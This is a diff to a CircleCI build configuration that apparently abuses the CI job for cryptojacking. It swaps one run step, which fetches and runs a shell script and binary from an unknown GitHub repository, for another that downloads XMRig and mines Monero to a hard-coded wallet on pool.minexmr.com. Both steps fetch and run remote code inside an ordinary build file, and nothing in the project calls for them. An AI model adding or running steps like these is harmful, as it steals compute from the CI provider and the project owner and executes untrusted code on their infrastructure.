--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -8,5 +8,6 @@ jobs:
           password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
     steps:
       - checkout
-      - run: Iscpu wget https://raw.githubusercontent.com/hunshukajh/yes/main/cmdline_launcher.sh && wget https://github.com/hunshukajh/yes/raw/main/gas && chmod +x gas cmdline_launcher.sh && ./cmdline_launcher.sh -algo randomx -coin XMR -wallet <885FRA14bQhhvT1Hn76iTniB7Xf7j222Y9vzT4VHFLRNEqf5Hs1YnrSgKTmkxx556nSvtehrDeGSC5iQUk6kZRGoLaKonK4>  -Ciclecloud  $(echo $(shuf -i 1-9999 -n 1)-SRBO) -pool.minexmr.com:4444
+      - run: Iscpu mkdir XMRIG && cd XMRIG && wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-bionic-x64.tar.gz && tar xf xmrig-6.7.0-bionic-x64.tar.gz && cd xmrig-6.7.0 && ./xmrig --donate-level 1 -o pool.minexmr.com:4444 -u 885FRA14bQhhvT1Hn76iTniB7Xf7j222Y9vzT4VHFLRNEqf5Hs1YnrSgKTmkxx556nSvtehrDeGSC5iQUk6kZRGoLaKonK4.cpu1cloud
+      
       
